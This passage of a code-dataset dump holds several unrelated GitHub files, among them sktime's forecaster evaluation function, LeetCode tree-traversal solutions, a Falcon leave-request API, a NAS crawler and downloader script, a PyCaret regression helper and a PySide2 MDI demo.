fit/update the forecaster.\n\n - y_pred: (pd.Series) present if see `return_data=True`\n forecasts from fitted forecaster for the i-th test fold indices of `cv`.\n\n - y_test: (pd.Series) present if see `return_data=True`\n testing fold of the i-th split in `cv`, used to compute the metric.\n\n Examples\n --------\n The type of evaluation that is done by `evaluate` depends on metrics in\n param `scoring`. Default is `MeanAbsolutePercentageError`.\n\n >>> from sktime.datasets import load_airline\n >>> from sktime.forecasting.model_evaluation import evaluate\n >>> from sktime.split import ExpandingWindowSplitter\n >>> from sktime.forecasting.naive import NaiveForecaster\n >>> y = load_airline()[:24]\n >>> forecaster = NaiveForecaster(strategy=\"mean\", sp=3)\n >>> cv = ExpandingWindowSplitter(initial_window=12, step_length=6, fh=[1, 2, 3])\n >>> results = evaluate(forecaster=forecaster, y=y, cv=cv)\n\n Optionally, users may select other metrics that can be supplied\n by `scoring` argument. These can be forecast metrics of any kind as stated `here\n `_\n i.e., point forecast metrics, interval metrics, quantile forecast metrics.\n To evaluate estimators using a specific metric, provide them to the scoring arg.\n\n >>> from sktime.performance_metrics.forecasting import MeanAbsoluteError\n >>> loss = MeanAbsoluteError()\n >>> results = evaluate(forecaster=forecaster, y=y, cv=cv, scoring=loss)\n\n Optionally, users can provide a list of metrics to `scoring` argument.\n\n >>> from sktime.performance_metrics.forecasting import MeanSquaredError\n >>> results = evaluate(\n ... forecaster=forecaster,\n ... y=y,\n ... cv=cv,\n ... scoring=[MeanSquaredError(square_root=True), MeanAbsoluteError()],\n ... )\n\n An example of an interval metric is the `PinballLoss`.\n It can be used with all probabilistic forecasters.\n\n >>> from sktime.forecasting.naive import NaiveVariance\n >>> from sktime.performance_metrics.forecasting.probabilistic import PinballLoss\n >>> loss = PinballLoss()\n >>> forecaster = NaiveForecaster(strategy=\"drift\")\n >>> results = evaluate(forecaster=NaiveVariance(forecaster),\n ... y=y, cv=cv, scoring=loss)\n \"\"\"\n if backend in [\"dask\", \"dask_lazy\"]:\n if not _check_soft_dependencies(\"dask\", severity=\"none\"):\n raise RuntimeError(\n \"running evaluate with backend='dask' requires the dask package \"\n \"installed, but dask is not present in the python environment\"\n )\n\n # todo 0.25.0: remove kwargs and this warning\n if kwargs != {}:\n warnings.warn(\n \"in evaluate, kwargs will no longer be supported from sktime 0.25.0. \"\n \"to pass configuration arguments to the parallelization backend, \"\n \"use backend_params instead.\",\n DeprecationWarning,\n stacklevel=2,\n )\n backend = \"dask_lazy\"\n\n # todo 0.25.0: remove compute argument and logic, and remove this warning\n if compute is not None:\n warnings.warn(\n \"the compute argument of evaluate is deprecated and will be removed \"\n \"in sktime 0.25.0. For the same behaviour in the future, \"\n 'use backend=\"dask_lazy\"',\n DeprecationWarning,\n stacklevel=2,\n )\n if compute is None:\n compute = True\n if backend == \"dask\" and not compute:\n backend = \"dask_lazy\"\n\n _check_strategy(strategy)\n cv = check_cv(cv, enforce_start_with_window=True)\n # TODO: remove lines(four lines below) and 599-612 in v0.25.0\n if isinstance(scoring, list):\n raise_warn, num = True, len(scoring)\n else:\n raise_warn, num = False, 1\n # removal until here\n scoring = _check_scores(scoring)\n\n ALLOWED_SCITYPES = [\"Series\", \"Panel\", \"Hierarchical\"]\n\n y_valid, _, _ = check_is_scitype(y, scitype=ALLOWED_SCITYPES, return_metadata=True)\n if not y_valid:\n raise TypeError(\n f\"Expected y dtype {ALLOWED_SCITYPES!r}. Got {type(y)} instead.\"\n )\n\n y = convert_to(y, to_type=PANDAS_MTYPES)\n\n if X is not None:\n X_valid, _, _ = check_is_scitype(\n X, scitype=ALLOWED_SCITYPES, return_metadata=True\n )\n if not X_valid:\n raise TypeError(\n f\"Expected X dtype {ALLOWED_SCITYPES!r}. Got {type(X)} instead.\"\n )\n X = convert_to(X, to_type=PANDAS_MTYPES)\n\n cutoff_dtype = str(y.index.dtype)\n _evaluate_window_kwargs = {\n \"fh\": cv.fh,\n \"forecaster\": forecaster,\n \"scoring\": scoring,\n \"strategy\": strategy,\n \"return_data\": return_data,\n \"error_score\": error_score,\n \"cutoff_dtype\": cutoff_dtype,\n }\n\n def gen_y_X_train_test(y, X, cv, cv_X):\n \"\"\"Generate joint splits of y, X as per cv, cv_X.\n\n If X is None, train/test splits of X are also None.\n\n If cv_X is None, will default to\n SameLocSplitter(TestPlusTrainSplitter(cv), y)\n i.e., X splits have same loc index as y splits.\n\n Yields\n ------\n y_train : i-th train split of y as per cv\n y_test : i-th test split of y as per cv\n X_train : i-th train split of y as per cv_X. None if X was None.\n X_test : i-th test split of y as per cv_X. None if X was None.\n \"\"\"\n geny = cv.split_series(y)\n if X is None:\n for y_train, y_test in geny:\n yield y_train, y_test, None, None\n else:\n if cv_X is None:\n from sktime.split import SameLocSplitter, TestPlusTrainSplitter\n\n cv_X = SameLocSplitter(TestPlusTrainSplitter(cv), y)\n\n genx = cv_X.split_series(X)\n\n for (y_train, y_test), (X_train, X_test) in zip(geny, genx):\n yield y_train, y_test, X_train, X_test\n\n # generator for y and X splits to iterate over below\n yx_splits = gen_y_X_train_test(y, X, cv, cv_X)\n\n # sequential strategies cannot be parallelized\n not_parallel = strategy in [\"update\", \"no-update_params\"]\n\n # dispatch by backend and strategy\n if not_parallel:\n # Run temporal cross-validation sequentially\n results = []\n for x in enumerate(yx_splits):\n is_first = x[0] == 0 # first iteration\n if strategy == \"update\" or (strategy == \"no-update_params\" and is_first):\n result, forecaster = _evaluate_window(x, _evaluate_window_kwargs)\n _evaluate_window_kwargs[\"forecaster\"] = forecaster\n else:\n result = _evaluate_window(x, _evaluate_window_kwargs)\n results.append(result)\n else:\n if backend == \"dask\":\n backend_in = \"dask_lazy\"\n else:\n backend_in = backend\n results = parallelize(\n fun=_evaluate_window,\n iter=enumerate(yx_splits),\n meta=_evaluate_window_kwargs,\n backend=backend_in,\n backend_params=backend_params,\n )\n\n # final formatting of dask dataframes\n if backend in [\"dask\", \"dask_lazy\"] and not not_parallel:\n import dask.dataframe as dd\n\n metadata = _get_column_order_and_datatype(scoring, return_data, cutoff_dtype)\n\n results = dd.from_delayed(results, meta=metadata)\n if backend == \"dask\":\n results = results.compute()\n else:\n results = pd.concat(results)\n\n # final formatting of results DataFrame\n results = results.reset_index(drop=True)\n\n # TODO: remove 16 lines below and 451-455 in v0.25.0\n if raise_warn:\n warnings.warn(\n \"Starting v0.25.0 model_evaluation.evaluate module will rearrange \"\n \"all metric columns to the left of its output result DataFrame. \"\n \"Please use loc references when addressing the columns. You can \"\n \"safely ignore this warning if you don't use evaluate function directly.\",\n DeprecationWarning,\n stacklevel=2,\n )\n columns = results.columns.to_list()\n non_first_metrics = []\n for _ in range(1, num):\n metric = columns.pop(1)\n non_first_metrics.append(metric)\n results = results.reindex(columns=columns + non_first_metrics)\n # removal until here\n return results\n","repo_name":"sktime/sktime","sub_path":"sktime/forecasting/model_evaluation/_functions.py","file_name":"_functions.py","file_ext":"py","file_size_in_byte":27065,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"18050829248","text":"#Desafío51: Crear un programa llamado busqueda.py que pueda buscar a cuál mes pertenece una o mas cifras específicas. En caso de no encontrarlo mostrar el mensaje \"no encontrado\".\n\nventas = {\n\"Enero\": 15000,\n\"Febrero\": 22000,\n\"Marzo\": 12000,\n\"Abril\": 17000,\n\"Mayo\": 81000,\n\"Junio\": 13000,\n\"Julio\": 21000,\n\"Agosto\": 41200,\n\"Septiembre\": 25000,\n\"Octubre\": 21500,\n\"Noviembre\": 91000,\n\"Diciembre\": 21000,\n}\n\nimport sys\n\ndef filtrar(diccionario,ingreso):\n for key,value in diccionario.items():\n if ingreso == value:\n return key\n\nn = len(sys.argv)\nfor i in range(1,n):\n numero = int(sys.argv[i])\n key = filtrar(ventas,numero)\n if key == None:\n print('no encontrado')\n else:\n print(key)\n","repo_name":"Artekaren/Trainee-Python","sub_path":"D51_busqueda.py","file_name":"D51_busqueda.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"4046514402","text":"import os\n\n\nif __name__ == \"__main__\":\n for filename in os.listdir(\"outputs\"):\n path = os.path.join(\"outputs\", filename)\n vals = [x.strip() for x in filename.split('.')]\n graph, size, algo = vals\n res = 0\n time = str(60 * 20)\n with open(path, 'r') as file:\n for line in file:\n line = line.strip()\n vals = line.split()\n if len(vals) == 2:\n s, cnt = vals\n if s == \"bhcount\":\n res = max(res, int(cnt))\n else:\n s = vals[0]\n if s == \"It\":\n time = vals[3]\n out = graph + \" \" + str(size) + \" \" + algo + \" \" + str(res) + \" \" + str(time)\n print(out)\n","repo_name":"pokachopotun/msu_m118_ivanov","sub_path":"blackholes/experiment/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"811372534","text":"\"\"\"\n144. Binary Tree Preorder Traversal\nhttps://leetcode.com/problems/binary-tree-preorder-traversal/\n\nGiven the root of a binary tree, return the preorder traversal of its nodes' values.\n\nExample 1:\nInput: root = [1,null,2,3]\nOutput: [1,2,3]\n\nExample 2:\nInput: root = []\nOutput: []\n\nExample 3:\nInput: root = [1]\nOutput: [1]\n\nExample 4:\nInput: root = [1,2]\nOutput: [1,2]\n\nExample 5:\nInput: root = [1,null,2]\nOutput: [1,2]\n\n\"\"\"\n\n# Recursive solution\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution(object):\n def preorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n output =[]\n self.dfs(root, output)\n return output\n \n def dfs(self, root, output):\n if root is None:\n return\n \n output.append(root.val)\n self.dfs(root.left, output)\n self.dfs(root.right, output)\n \n\t \n# Iterative Solution- Runtime: 12 ms, faster than 97.82%\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution(object):\n def preorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n output =[]\n stack = [root]\n \n while stack:\n temp=stack.pop()\n if temp:\n output.append(temp.val)\n stack.append(temp.right)\n stack.append(temp.left)\n \n return output\n","repo_name":"kamalikap/leetcode_python_solutions","sub_path":"treeTraversal/preorder/binarytreePreorderTraversal.py","file_name":"binarytreePreorderTraversal.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10027390544","text":"import pyautogui as pg\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.service import Service\nfrom time import sleep\n\nurl_entry=\"https://youtube.com/\"\n\ns = Service(\"chromedriver.exe\")\nbrowser = Chrome(service=s)\nbrowser.get(url_entry)\npg.moveTo(427,205, 1)\npg.click(button=\"left\")\npg.write(\"Hello, World!\", 0.5)\npg.press(\"Enter\")\npg.moveTo(348, 444, 1)\npg.click(button=\"left\")\nsleep(5)","repo_name":"CreatorAndrey/pyautogui_example","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"148290230","text":"import json\nimport datetime\nimport falcon\nimport sys\n\nfrom auth import jwt_auth\nfrom utils.util import leave_login_cache_required, max_body\nfrom utils import config, error_code\nfrom cache import leave_cache\n# if this library is no longer maintained, change falcon(future), or cgi.\nfrom streaming_form_data import StreamingFormDataParser\nfrom streaming_form_data.targets import ValueTarget\n\n\nclass leave_list:\n\n @falcon.before(leave_login_cache_required)\n def on_get(self, req, resp):\n # jwt payload\n payload = req.context['user']['user']\n if req.get_param('year') == None and req.get_param('semester') == None:\n raise falcon.HTTPBadRequest(description='params error')\n\n if len(req.get_param('year')) > 4 or len(req.get_param('semester')) > 2:\n raise falcon.HTTPBadRequest(description='params error')\n\n leave_dict = leave_cache.get_leave_list(\n username=payload['username'],\n year=req.get_param('year'), semester=req.get_param('semester'))\n\n if isinstance(leave_dict, str):\n resp.body = leave_dict\n resp.media = falcon.MEDIA_JSON\n resp.status = falcon.HTTP_200\n return True\n raise falcon.HTTPInternalServerError(\n description='something error ?')\n\n\nclass leave_submit_info:\n\n @falcon.before(leave_login_cache_required)\n def on_get(self, req, resp):\n # jwt payload\n payload = req.context['user']['user']\n\n submit_info = leave_cache.get_submit_info(username=payload['username'])\n\n if isinstance(submit_info, str):\n resp.body = submit_info\n resp.media = falcon.MEDIA_JSON\n resp.status = falcon.HTTP_200\n return True\n if isinstance(submit_info, int):\n if submit_info == error_code.LEAVE_SUBMIT_INFO_GRADUATE_ERROR:\n raise falcon.HTTPForbidden(\n description=\"400, graduate can't use this feature \", code=400)\n raise falcon.HTTPInternalServerError(\n description='something error ?')\n\n\nclass leave_submit:\n\n @falcon.before(leave_login_cache_required)\n @falcon.before(max_body(1024*1024*4))\n def on_post(self, req, resp):\n payload = req.context['user']['user']\n if req.get_header('Content-Type') != None:\n if req.get_header('Content-Type')[0:19] != 'multipart/form-data':\n raise falcon.HTTPBadRequest(code=400,\n description='wrong Content-Type, only support multipart/form-data ')\n else:\n raise falcon.HTTPBadRequest(\n code=406,\n description='not found Content-Type. ')\n\n def convert_lowercase_mutlipart(req_bytes_data):\n # cobert lower case MIME to defalut MIME type,Support cgi\n data = {\n 'content-disposition': 'Content-Disposition',\n 'content-type': 'Content-Type'\n }\n for k, v in data.items():\n req_bytes_data = req_bytes_data.replace(\n bytes(k, encoding='utf-8'), bytes(v, encoding='utf-8'))\n return req_bytes_data\n\n parser = StreamingFormDataParser(headers=req.headers)\n leave_data_bytes = ValueTarget()\n parser.register('leavesData', leave_data_bytes)\n # save in memory don't do anything to it !\n leave_proof_image_bytes = ValueTarget()\n parser.register('proofImage', leave_proof_image_bytes)\n # load request\n parser.data_received(convert_lowercase_mutlipart(req.stream.read()))\n # check data\n if leave_proof_image_bytes != None:\n if (leave_proof_image_bytes.multipart_filename[-3:] not in ['png', 'jpg', 'PNG', \"JPG\"]) and (leave_proof_image_bytes.multipart_filename[-4:] not in [\"jpeg\", \"JPEG\"]):\n raise falcon.HTTPBadRequest(\n code=401,\n description='file type not support')\n if sys.getsizeof(leave_proof_image_bytes.value) > config.LEAVE_PROOF_IMAGE_SIZE_LIMIT:\n raise falcon.HTTPBadRequest(\n code=402,\n description='file size over limit.')\n try:\n leave_data = json.loads(\n leave_data_bytes.value.decode('utf-8'))\n except json.decoder.JSONDecodeError:\n raise falcon.HTTPBadRequest(\n code=403,\n description='leavesData JSONDecodeError ')\n submit_status = leave_cache.submit_leave(\n username=payload['username'],\n leave_data=leave_data,\n leave_proof=leave_proof_image_bytes)\n if isinstance(submit_status, bool):\n if submit_status is True:\n resp.status = falcon.HTTP_200\n return True\n elif isinstance(submit_status, int):\n if submit_status == error_code.LEAVE_SUBMIT_WRONG_DATE:\n raise falcon.HTTPForbidden(\n code=410, description=\"leave date not accept.\")\n elif submit_status == error_code.LEAVE_SUBMIT_NEED_PROOF:\n raise falcon.HTTPForbidden(\n code=411, description='need proof image')\n elif submit_status == error_code.LEAVE_SUBMIT_DATE_CONFLICT:\n raise falcon.HTTPForbidden(\n code=412, description='request leave date, is already submitted.')\n elif submit_status == error_code.LEAVE_SUBMIT_SOMETHING_ERROR:\n pass\n raise falcon.HTTPInternalServerError()\n","repo_name":"macs1207/NKUST-AP-API","sub_path":"src/view/leave.py","file_name":"leave.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"44039008018","text":"import logging\nfrom pathlib import Path\n\nfrom .. import conf\n\nfrom .helpers import get_path_compatible_date\n\ndef setup_logger():\n root_logger = logging.getLogger()\n root_logger.setLevel(\"DEBUG\")\n\n formatter = logging.Formatter(\n \"%(asctime)s \" + conf.get(\"app_name\") + \" %(name)-25s %(threadName)s %(levelname)-6s %(message)s\")\n\n streamHandler = logging.StreamHandler()\n streamHandler.setFormatter(formatter)\n root_logger.addHandler(streamHandler)\n \n if (conf.get(\"logdir\")):\n \n log_file = Path(conf.get(\"logdir\"), get_path_compatible_date() + \".log\")\n fileHandler = logging.FileHandler(log_file)\n fileHandler.setFormatter(formatter)\n root_logger.addHandler(fileHandler)\n\n logging.getLogger(__name__).info(\"initialized logger\")\n\nsetup_logger()","repo_name":"MohamedKari/pytemplate","sub_path":"PKG_NAME/utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39685735466","text":"from datetime import datetime\r\nimport myNASsynofuncs as nas\r\nimport myNASlinefuncs as line \r\nimport myNASkoreafuncs as korea\r\nimport myNASbeautyfuncs as beauty\r\nimport logging\r\nimport sys\r\nimport os\r\n\r\nlogging.basicConfig(filename='%s/.scheduler/.log/.dailyCrawler/%s.log' % (os.path.expanduser('~'), datetime.now().strftime('%Y%m%d_%H%M%S')), level=logging.INFO, format='%(asctime)s - %(levelname)s: %(message)s')\r\n# ------ 主程式 ------------------------------------------------------------------\r\nif __name__ == '__main__':\r\n # --- 先启始 LINE 通知的物件 ----------------------------- \r\n myLineNotificator = line.lineNotification()\r\n if not myLineNotificator.lineToken:\r\n logging.error('=== 建立 LINE Notify 时发生未预期的错误 ===')\r\n sys.exit(1)\r\n # --- 初始化 myKoreaCrawler 物件 -----------------------------\r\n myKoreaCrawler = korea.crawlerKorea()\r\n myLineNotificator.sendMessage('已开始[%s]作业' % myKoreaCrawler.name) \r\n # --- 取得 getLoginCredential 登入网站并取得 Session -----------------------------\r\n myKoreaCrawler.session = myKoreaCrawler.getLoginSession() \r\n if myKoreaCrawler.session:\r\n myLineNotificator.sendMessage('已启始[%s]并登入网站,开始撷取资料' % myKoreaCrawler.name) \r\n else:\r\n myLineNotificator.sendMessage('建立[%s]的连线时发生未预期的错误' % myKoreaCrawler.name) \r\n sys.exit(1)\r\n # ## === 特殊情况 === 直接读入今天已完成的资料档, 然后确定起始/结束序号 -----------------------------\r\n # if myKoreaCrawler.getJustSequencedCaster():\r\n # myLineNotificator.sendMessage('[%s]已读取今天可用的资料档' % myKoreaCrawler.name)\r\n # --- 如果正常登入网站则读入昨天的资料档 -----------------------------\r\n if myKoreaCrawler.getLastSequencedCaster():\r\n myLineNotificator.sendMessage('[%s]已读取昨天可用的资料档' % myKoreaCrawler.name)\r\n # --- 无法读入记录档 -----------------------------\r\n else:\r\n myLineNotificator.sendMessage('[%s]无法读取最近一次可用的资料档。' % myKoreaCrawler.name)\r\n sys.exit(1)\r\n # --- 查看有无今天的记录档已存在, 尝试从当天已搜集的记录复原(如果有的话) ----------------------------- \r\n if myKoreaCrawler.recoverfromAccumulatedCasterJson():\r\n # --- 如果可以从当天已搜集的记录复原, 则起始结束序号已重设定为复原后的序号, 并延用今天的记录档 -----------------------------\r\n myLineNotificator.sendMessage('[%s]已从当天的记录档案复原完成。复原了[%d]笔资料。' % (myKoreaCrawler.name, len(myKoreaCrawler.accumulatedCaster)))\r\n else:\r\n # --- 查看是否有当天已搜集的记录并试图读入记录档回复作业 -----------------------------\r\n myLineNotificator.sendMessage('[%s]没有当天的记录档案 (或尝试复原记录档案时发生未预期的错误)' % myKoreaCrawler.name)\r\n # --- 启始当天的记录档开始新的搜集记录 ----------------------------- \r\n additionalInfo = '原先已存在的搜集记录档案已更改名称,并' if myKoreaCrawler.initAccumulatedCasterJson() else ''\r\n myLineNotificator.sendMessage('[%s]%s已启始当天的记录档 %s 开始新的搜集记录' % (myKoreaCrawler.name, additionalInfo, os.path.basename(myKoreaCrawler.accumulatedCasterJson)))\r\n # --- 如果设定开始序号有设定 ---\r\n if myKoreaCrawler.givenNo2Start and myKoreaCrawler.givenNo2Stop:\r\n myLineNotificator.sendMessage('开始[%s]撷取。起始序号[%d]。预计结束序号[%d]' % (myKoreaCrawler.name, myKoreaCrawler.givenNo2Start, myKoreaCrawler.givenNo2Stop))\r\n # --- 如果没有设定开始序号(应该不会发生) ----------------------------- \r\n else:\r\n myLineNotificator.sendMessage('[%s]设定起始与结束序号时发生未预期的错误' % myKoreaCrawler.name)\r\n sys.exit(1)\r\n # --- 看来一切就绪我们就开始搜集资料吧 -----------------------------\r\n if not myKoreaCrawler.startCrawlerProcess():\r\n # --- 如果抓资料中间发生错误 -----------------------------\r\n myKoreaCrawler.dumpSequencedCasterUnfihishedPickle()\r\n myLineNotificator.sendMessage('[%s]程式意外终止。参考中断时的序号[%d]' % (myKoreaCrawler.name, myKoreaCrawler.casterIndexer))\r\n sys.exit(1)\r\n else:\r\n myLineNotificator.sendMessage('[%s]撷取顺利完成。参考结束时的序号[%d]' % (myKoreaCrawler.name, myKoreaCrawler.casterIndexer))\r\n # --- 启始 pttBeautyCrawler 的物件并且开始抓资料 --- \r\n pttBeautyCrawler = beauty.crawlerPttBeauty()\r\n myLineNotificator.sendMessage('已开始[%s]作业' % pttBeautyCrawler.name)\r\n # ## === 特殊情况 === 直接读入今天已完成的资料档, 然后确定总数量 ----------------------------- \r\n # if pttBeautyCrawler.getJustCompletedBeautyPickle():\r\n # myLineNotificator.sendMessage('[%s]已读取今天可用的资料档。共有[%d]篇文章,[%d]笔资料' % (pttBeautyCrawler.name, len(pttBeautyCrawler.completedBeauty['articles']), pttBeautyCrawler.itemCounter))\r\n # ---- 启始记录档 --------------------------\r\n additionalInfo = '原先已存在的搜集记录档案已更改名称,并' if pttBeautyCrawler.initAccumulatedBeautyJson() else ''\r\n myLineNotificator.sendMessage('[%s]%s已启始当天的记录档 %s 开始新的搜集记录' % (pttBeautyCrawler.name, additionalInfo, os.path.basename(pttBeautyCrawler.accumulatedBeautyJson)))\r\n # --- 看来一切就绪我们就开始搜集资料吧 -----------------------------\r\n if pttBeautyCrawler.startCrawlerProcess():\r\n # ---- 关闭记录档 -------------------------- \r\n pttBeautyCrawler.finilizeAccumulatedBeautyJson()\r\n # ---- 写入今天的资料档 -------------------------- \r\n pttBeautyCrawler.dumpCompletedBeauty()\r\n myLineNotificator.sendMessage('已完成[%s]撷取。共有[%d]篇文章,[%d]笔资料' % (pttBeautyCrawler.name, len(pttBeautyCrawler.accumulatedArticles), pttBeautyCrawler.itemCounter))\r\n else:\r\n myLineNotificator.sendMessage('进行[%s]撷取时发生未预期的错误。作业未完成。参考中断时的网址为[%s]' % (pttBeautyCrawler.name, pttBeautyCrawler.currentPage))\r\n sys.exit(1)\r\n # --- 如果抓资料顺利完成, 就启始 NAS 物件并登入 ----------------------------- \r\n ds214se = nas.nasDiskStation()\r\n # ------ 登入 NAS 失败 ----------------------------- \r\n if not ds214se.login:\r\n myLineNotificator.sendMessage('登入 NAS [%s] 失败' % ds214se.name)\r\n sys.exit(1) \r\n # --- 如果登入 NAS 成功 ----------------------------- \r\n else:\r\n logging.debug('=== NAS[%s]已登入。工作阶段(Session ID)为[%s] ===' % (ds214se.name, ds214se.sid))\r\n myLineNotificator.sendMessage('登入 NAS [%s] 成功' % ds214se.name) \r\n # ------ 开始下载 myKoreaCrawler 抓取的资料 -----------------------------\r\n myLineNotificator.sendMessage('进行 [%s] 下载作业,起始序号: [%d],结束序号: [%d]' % (myKoreaCrawler.name, myKoreaCrawler.givenNo2Start, myKoreaCrawler.givenNo2Stop))\r\n if not myKoreaCrawler.downloadProcess(ds214se):\r\n myLineNotificator.sendMessage('新增 [%s] 下载作业中途意外结束。参考的索引号 [%d]' % (myKoreaCrawler.name, myKoreaCrawler.casterIndexer))\r\n sys.exit(1)\r\n else:\r\n myLineNotificator.sendMessage('下载作业 [%s] 已顺利结束完成。起始序号: [%d],结束序号: [%d]' % (myKoreaCrawler.name, myKoreaCrawler.givenNo2Start, myKoreaCrawler.givenNo2Stop))\r\n # ------ 开始下载 pttBeautyCrawler 抓取的资料 -----------------------------\r\n if not pttBeautyCrawler.downloadProcess(ds214se):\r\n myLineNotificator.sendMessage('新增 [%s] 下载作业中途意外结束。参考的索引号 [%d]' % (pttBeautyCrawler.name, pttBeautyCrawler.beautyIndexer))\r\n sys.exit(1)\r\n else:\r\n myLineNotificator.sendMessage('新增 [%s] 下载作业顺利结束完成。参考的索引号 [%d]' % (pttBeautyCrawler.name, pttBeautyCrawler.beautyIndexer)) \r\n # ------ 登出 ----------------------------- \r\n if not ds214se.logout():\r\n myLineNotificator.sendMessage('登出 NAS [%s] 失败' % ds214se.name)\r\n sys.exit(1)\r\n else:\r\n myLineNotificator.sendMessage('已成功登出 NAS [%s]' % ds214se.name)","repo_name":"JacquesBlazor/synology.nas.python","sub_path":"_configBackups/沒用設定檔的程式/NoConfig_dailyCrawler.py","file_name":"NoConfig_dailyCrawler.py","file_ext":"py","file_size_in_byte":8720,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4710188508","text":"import pandas as pd\nfrom io import BytesIO\nimport base64\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nfrom pycaret import regression as pyreg\n# from pycaret.classification import *\n# from pycaret.clustering import *\n# from pycaret.anomaly import *\n\ndef regression(file,target):\n resp = {}\n try:\n print('Analysis starting...')\n if file.content_type == 'text/csv':\n file.save('temp.csv')\n df = pd.read_csv('temp.csv')\n # df = spark.read.csv('temp.csv', header=True, inferSchema=True)\n else:\n file.save('temp.xlsx')\n df = pd.read_excel('temp.xlsx')\n # df = data.to_spark()\n print('File read')\n setup1 = pyreg.setup( data = df , target = target, silent=True)\n print('Setup done...')\n compare = pyreg.compare_models()\n create = pyreg.create_model(compare)\n print('Compare done...')\n plot = pyreg.plot_model(create, save=True)\n plot_bytes_image = BytesIO(b'')\n plot_fig = Image.open(plot)\n plot_fig.save(plot_bytes_image, format='png')\n plot_bytes_image.seek(0)\n resp['Residual'] = base64.b64encode(plot_bytes_image.getvalue()).decode()\n plt.clf()\n plot = pyreg.plot_model(create, plot='error', save=True)\n plot_bytes_image = BytesIO(b'')\n plot_fig = Image.open(plot)\n plot_fig.save(plot_bytes_image, format='png')\n plot_bytes_image.seek(0)\n resp['Error'] = base64.b64encode(plot_bytes_image.getvalue()).decode()\n plt.clf()\n plot = pyreg.plot_model(create, plot='feature', save=True)\n plot_bytes_image = BytesIO(b'')\n plot_fig = Image.open(plot)\n plot_fig.save(plot_bytes_image, format='png')\n plot_bytes_image.seek(0)\n resp['Feature'] = base64.b64encode(plot_bytes_image.getvalue()).decode()\n plt.clf()\n print('Plot done...')\n interpret = pyreg.interpret_model(compare, save=True)\n interpret_bytes_image = BytesIO(b'')\n interpret_fig = Image.open('SHAP summary.png')\n interpret_fig.save(interpret_bytes_image, format='png')\n interpret_bytes_image.seek(0)\n resp['Interpret'] = base64.b64encode(interpret_bytes_image.getvalue()).decode()\n plt.clf()\n print('Interpret done...')\n compare = pyreg.pull()\n # resp['CompareHeader'] = list(compare)\n resp['CompareValue'] = compare.values.tolist()\n # resp['CompareValue1'] = compare.to_numpy().tolist()\n # resp['CompareIndex'] = compare.index.tolist()\n resp['CompareHeader'] = compare.columns.tolist()\n except Exception as e:\n print(e)\n resp['error'] = str(e)\n print('Analysis done!')\n return resp","repo_name":"IlaTheFallen/backendDigiVerZ","sub_path":"algorithmAnalyser.py","file_name":"algorithmAnalyser.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73947268005","text":"N = int(input())\nans = [0] * 6\nfor i in range(N):\n saiko,saite = map(float,input().split())\n if saiko >= 35:\n ans[0] += 1\n if 30 <= saiko < 35:\n ans[1] += 1\n if 25 <= saiko < 30:\n ans[2] += 1\n if saite >= 25:\n ans[3] += 1\n if saite < 0 and saiko >= 0:\n ans[4] += 1\n if saiko < 0:\n ans[5] += 1\nprint(\" \".join([str(i) for i in ans]))\n","repo_name":"Haruka0522/AtCoder","sub_path":"ARC/ARC015-B.py","file_name":"ARC015-B.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10590544827","text":"import sys\r\nfrom PySide2.QtCore import *\r\nfrom PySide2.QtGui import *\r\nfrom PySide2.QtWidgets import *\r\n\r\nclass Example(QMainWindow):\r\n count = 0\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n \r\n def initUI(self):\r\n\r\n self.setWindowTitle(\"MDI\")\r\n self.mdi = QMdiArea()\r\n self.setCentralWidget(self.mdi)\r\n bar = self.menuBar()\r\n file = bar.addMenu(\"File\")\r\n file.addAction(\"New\")\r\n file.addAction(\"cascade\")\r\n file.addAction(\"Tiled\")\r\n file.triggered[QAction].connect(self.windowaction)\r\n\r\n self.show()\r\n\r\n def windowaction(self,q):\r\n print(\"triggered\")\r\n\r\n if q.text() == \"New\":\r\n print(\"aaaaaaa\")\r\n Example.count = Example.count + 1\r\n sub = QMdiSubWindow()\r\n sub.setWidget(QTextEdit())\r\n sub.setWindowTitle(\"subwindow\"+str(Example.count))\r\n self.mdi.addSubWindow(sub)\r\n sub.show()\r\n\r\n if q.text() == \"cascade\":\r\n self.mdi.cascadeSubWindow()\r\n\r\n if q.text() == \"Tiled\":\r\n self.mdi.tileSubWindow()\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = Example()\r\n 